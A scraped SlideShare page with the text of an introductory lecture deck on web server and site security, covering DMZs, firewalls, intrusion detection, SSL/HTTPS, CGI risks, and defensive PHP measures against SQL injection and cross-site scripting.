Web Server Web Site Security

2,315 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,315
On SlideShare
0
From Embeds
0
Number of Embeds
81
Actions
Shares
0
Downloads
61
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Web Server Web Site Security

  1. 1. Web Server and Web Site Security<br />
  2. 2. Web Server and Web Site Security<br />Web Server Security<br />
  3. 3. Web Server and Web Site Security<br />Demilitarised Zones<br />
  4. 4. Web Server and Web Site Security<br /><ul><li>A DMZ is a network area that sits between an internal network and an external network (generally the Internet).
  5. 5. The point of a DMZ is that connections from the internal and the external network to the DMZ are permitted, whereas connections from the DMZ are only permitted to the external network – hosts in the DMZ may not connect to the internal network.</li></li></ul><li>Web Server and Web Site Security<br />
  6. 6. Web Server and Web Site Security<br />DMZ and Web Servers<br /><ul><li>Web servers may need to communicate with an internal database to provide some specialised services.
  7. 7. Since the database server is not publically accessible and may contain sensitive information, it should not be in the DMZ.</li></li></ul><li>Web Server and Web Site Security<br />DMZ and Web Servers<br /><ul><li>Generally, it is not a good idea to allow the web server to communicate directly with the internal database server.
  8. 8. Instead, an application server can be used to act as a medium for communication between the web server and the database server.</li></li></ul><li>Web Server and Web Site Security<br />Firewalls<br />
  9. 9. Web Server and Web Site Security<br /><ul><li>A firewall is a piece of hardware/software which functions in a networked environment to protect against communications forbidden by security policies.
  10. 10. Firewalls filter information coming from the Internet into your private network or computer system. If incoming packets of information is flagged by the firewall’ filters, it’s not allowed through.
  11. 11. Firewalls use one or more of three methods to control traffic flowing in and out of a network.</li></li></ul><li>Web Server and Web Site Security<br />Packet filtering<br /><ul><li>A type of service filtering to permit or deny network traffic based on the data source, destination, service or protocol of the data packets.</li></li></ul><li>Web Server and Web Site Security<br />Proxy Service<br /><ul><li>Information from the Internet is retrieved by the firewall and then sent to the requesting system and vice versa.</li></li></ul><li>Web Server and Web Site Security<br />Stateful Inspection<br /><ul><li>Compares certain key parts of the packet to a database of trusted information.
  12. 12. Information travelling from inside the firewall to the outside is monitored for specific defining characteristics, then incoming information is compared to these characteristics.
  13. 13. If the comparison yields a reasonable match, the information is allowed through. Otherwise it is discarded.</li></li></ul><li>Web Server and Web Site Security<br />What a firewall protects you from?<br /><ul><li>Remote Login
  14. 14. Application Backdoors
  15. 15. Operating System Bugs
  16. 16. Denial of Service
  17. 17. E-mail Bombs
  18. 18. Viruses
  19. 19. Spam
  20. 20. Redirect Bombs
  21. 21. Source Routing</li></li></ul><li>Web Server and Web Site Security<br />Intrusion Detection System<br />
  22. 22. Web Server and Web Site Security<br /><ul><li>An Intrusion Detection Systems monitors any network traffic and logs/notifies against any possibly malicious activity.
  23. 23. An IDS is composed of several components:
  24. 24. Sensors which generate security events,
  25. 25. A console to monitor events and alerts and control the sensors
  26. 26. A central engine that records events logged by the sensors in a database and uses a system of rules to generate alerts from security events received.</li></li></ul><li>Web Server and Web Site Security<br />Web Security Protocols<br />
  27. 27. Web Server and Web Site Security<br />Secure Sockets Layer<br /><ul><li>Secure Sockets Layer (SSL) preserves user and content integrity as well as confidentiality so that communications from a client and the Web server, containing sensitive data such as passwords or credit card information, are protected.
  28. 28. SSL is based on the public key security protocol that protects communications by encrypting data before being transmitted.</li></li></ul><li>Web Server and Web Site Security<br />Secure HTTP<br /><ul><li>If you have used the Web, you have probably noticed that URLS for most Web pages begin with the HTTP prefix, which indicates that the request will be handled by TCP/IP port 80 using the HTTP protocol.
  29. 29. When Web page URLs begin with the prefix HTTPS they are requiring that their data be transferred from server to client and vice versa using SSL encryption. </li></li></ul><li>Web Server and Web Site Security<br />Secure HTTP<br /><ul><li>HTTPS uses the TCP port number 443, rather than port 80.
  30. 30. Once an SSL connection has been established between a Web server and client, the client's browser indicates this by showing a padlock in the lower-right corner of the screen.</li></li></ul><li>Web Server and Web Site Security<br />Web Site Security<br />
  31. 31. Web Server and Web Site Security<br />Common Gateway Interface<br />
  32. 32. Web Server and Web Site Security<br />What is a Common Gateway Interface?<br /><ul><li>The Common Gateway Interface (CGI) is a standard protocol for interfacing external application software with an information server, commonly a Web Server.</li></li></ul><li>Web Server and Web Site Security<br />&quot;CGI Scripts are essential software programs. SCGI scripts link servers and software and servers and other resources such as databases. These scripts are themselves small servers and this can create problems in making information too available. The problem with CGI scripts is that each one creates opportunities for exploitable bugs. Therefore, it is essential that business organisations ensure the security of not only servers but also the CGI scripts that link their servers to other resources used in the business.“<br />(2003, Lawrence, E., et al.)<br />
  33. 33. Web Server and Web Site Security<br />Web Form Validation<br />
  34. 34. Web Server and Web Site Security<br />Why we need to validate?<br />
  35. 35. Web Server and Web Site Security<br /><ul><li>When working with web forms, often you will have the data being placed into a database of some form.
  36. 36. You want to ensure that the correct data is going into the fields set in the tables.
  37. 37. You don't want alphanumeric characters going into fields that require numeric characters only.
  38. 38. Some fields might require specific information to be entered in a specific format, for example email addresses.
  39. 39. You will want your email addresses to be validated correctly and that is based on the username@domain.comstandard.</li></li></ul><li>Web Server and Web Site Security<br /><ul><li>Web Form Validation can take place on two fronts. Client Side and Server Side.
  40. 40. Client Side Validation will often be done with JavaScript whilst Server Side validation would be performed with a server side language such as PHP or ASP.
  41. 41. There are other reasons you would validate your web forms and that is due to vulnerabilities.
  42. 42. One such vulnerability which can leave you open to attack is with the method of SQL Injection.</li></li></ul><li>Web Server and Web Site Security<br />SQL Injection<br />
  43. 43. Web Server and Web Site Security<br />What is SQL Injection?<br />
  44. 44. Web Server and Web Site Security<br /><ul><li>SQL Injection is a technique that exploits a security vulnerability occurring in the database layer of an application.
  45. 45. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
  46. 46. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.</li></li></ul><li>Web Server and Web Site Security<br />Cross-Site Scripting<br />
  47. 47. Web Server and Web Site Security<br />What is Cross-Site Scripting?<br />
  48. 48. Web Server and Web Site Security<br />Preventing Cross-Site Scripting<br />
  49. 49. Web Server and Web Site Security<br /><ul><li>You have to be careful when you display data entered by a user on a web page because malicious users an include HTML tags and JavaScript in their input in an attempt to trick other users who might view that information into doing something they might not want to do, such as entering their password to your site and submitting it to another site.</li></li></ul><li>Web Server and Web Site Security<br /><ul><li>In order to prevent malicious users from doing that sort of thing, PHP includes the htmlspecialchars() function, which automatically encodes any special characters in a string so that they are displayed on a page rather than letting the browser treat them as markup.
  50. 50. Or, if you prefer, you can use htmlentities(), which encodes all of the characters that are encoded by thmlspecialchars() plus any other characters that can be represented as entities. </li></li></ul><li>Web Server and Web Site Security<br /><ul><li>In the preceeding example, you’d really want to write the script that displays the user’s name like this:</li></ul>&lt;p&gt;Hello &lt;?= htmlspecialchars($_POST[‘yourname’]) ?&gt; Thanks for visiting.&lt;/p&gt;<br /><ul><li>That prevents the person who submitted the data from launching a successful cross-site scripting attack.</li></li></ul><li>Web Server and Web Site Security<br /><ul><li>If you prefer, you can also use the strip_tags() function, which just removes all the HTML tags from a string.
  51. 51. Finally, if your form is submitted using the POST method, you should refer to the parameters using a $_POST rather than $_REQUEST, which also helps to avoid certain types of attacks by ignoring information appended to the URL via the query string.</li>

×